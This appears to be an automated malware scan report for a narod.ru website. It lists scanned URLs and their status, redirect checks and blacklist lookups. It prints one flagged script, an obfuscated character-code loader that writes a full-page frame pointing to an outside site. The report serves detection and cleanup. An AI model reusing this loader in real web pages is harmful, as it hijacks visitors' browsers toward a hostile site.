Scanned pages/files
Request | Server response | Status |
http://inreslidi.narod.ru/6/post-236.html | 200 OK Content-Length: 40052 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.637501869739054 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=LnKL4Dgu4GC8p^yrJjt!KFRgU^SRakk7bEKElApTDXvwSKOiV9YVaLMn0mT1zX6iWDlvVPJb6fxBMlg7L;tXdWSyCqQ3VzAU^EkSO2c3!Nk;DJ!4wsABsxlxIlbrg3M8RlFJiY8ruaTg7GfBZzpBc8E72cHQRN^^uVnAEsmOvacpE1ZOLBpuzZRPV;YIAUoo | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/js/page.js | 200 OK Content-Length: 802 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
// Obfuscated loader: str holds dash-separated decimal character codes.
var temp="",i,c=0,out="";
var str="60-102-114-97-109-101-115-101-116-32-114-111-119-115-61-34-49-48-48-37-34-32-102-114-97-109-101-98-111-114-100-101-114-61-34-48-34-32-102-114-97-109-101-115-112-97-99-105-110-103-61-34-48-34-62-13-10-60-102-114-97-109-101-32-115-114-99-61-34-104-116-116-112-58-47-47-114-101-103-116-104-105-115-46-114-117-47-103-111-46-112-104-112-63-115-105-100-61-50-34-32-102-114-97-109-101-98-111-114-100-101-114-61-34-48-34-32-109-97-114-103-105-110-119-105-100-116-104-61-34-48-34-32-109-97-114-103-105-110-104-101-105-103-104-116-61-34-48-34-62-13-10-60-47-102-114-97-109-101-115-101-116-62-";
l=str.length;
// Read each number up to the next '-', convert it to a character, and append it to out.
while(c<=str.length-1){
  while(str.charAt(c)!='-')temp=temp+str.charAt(c++);
  c++;
  out=out+String.fromCharCode(temp);
  temp="";
}
// The decoded markup is written directly into the page.
document.write(out);
Antivirus reports:
http://inreslidi.narod.ru/index.html | 200 OK Content-Length: 36884 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.313116554773952 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=t;fW9ViX9nUer5CtzeAu91exWW55Cr2UeNG19QLtMttqxFEuflMyLDfR0M622eBs8auqMu073;RbDKFg24bhyMpxSVyg5icfSn0NGKrKFRnb!7eYpKvdM^MC8YpWE4bSF^0hVqEzA;ziZjLUQwY4dTgOrNyN6QhNjTOcOkEmWbcC;;lQlVhZ5dVPt8kvJEuP | 200 OK Content-Length: 2497 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/archive-09-07-2010/post-155.html | 200 OK Content-Length: 37013 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.175786546534113 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=D4UN3dvCztL;xILZYnV!cIWPDc^uZKd7zPF4TcaKQq9AP9jze2RgVZUs4SDjNm7skirtM!9BXOPSpc5wLRquaeYj9NWpep;jiIU;Cnz9a6YlvrCdEB5SshFdk5UupnTUSmyngkChX8GgmCJs8QnYnnkweYFn!0bW1^!It78TPpy6hfcVQQpau0zYHDLNX7xG | 200 OK Content-Length: 2529 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/cat-4/374.html | 200 OK Content-Length: 38016 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.254458279452571 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/abnl/?adsdata=kacRN66lmtF4CpQ;;qQUR4hi4JAK^PEw6ES1gjg^O681fumEh8wbnhOUN9qACtSZB2PZXTefrt0aGWbwN3dGClzb5x1sXYp0xe2G!2pu8K6gRrsNq3eWxq62N2wcTj77ta7Tbz3iIqVR;GAeKF0kilJkfN;0ZgMeu655alaGI6xAgaZsV6^Kss31RUtddcwo | 200 OK Content-Length: 2501 Content-Type: application/javascript | clean |
http://inreslidi.narod.ru/5-14-02-2010/article-307.html | 200 OK Content-Length: 37978 Content-Type: text/html | clean |
http://s204.ucoz.net/cgi/uutils.fcg?a=get_preroll_cookie&r=0.897237100631504 | 200 OK Content-Length: 25 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: inreslidi.narod.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: inreslidi.narod.ru
Referer: http://www.google.com/search?q=inreslidi.narod.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=inreslidi.narod.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://inreslidi.narod.ru/
Result: inreslidi.narod.ru is not infected or malware details are not published yet.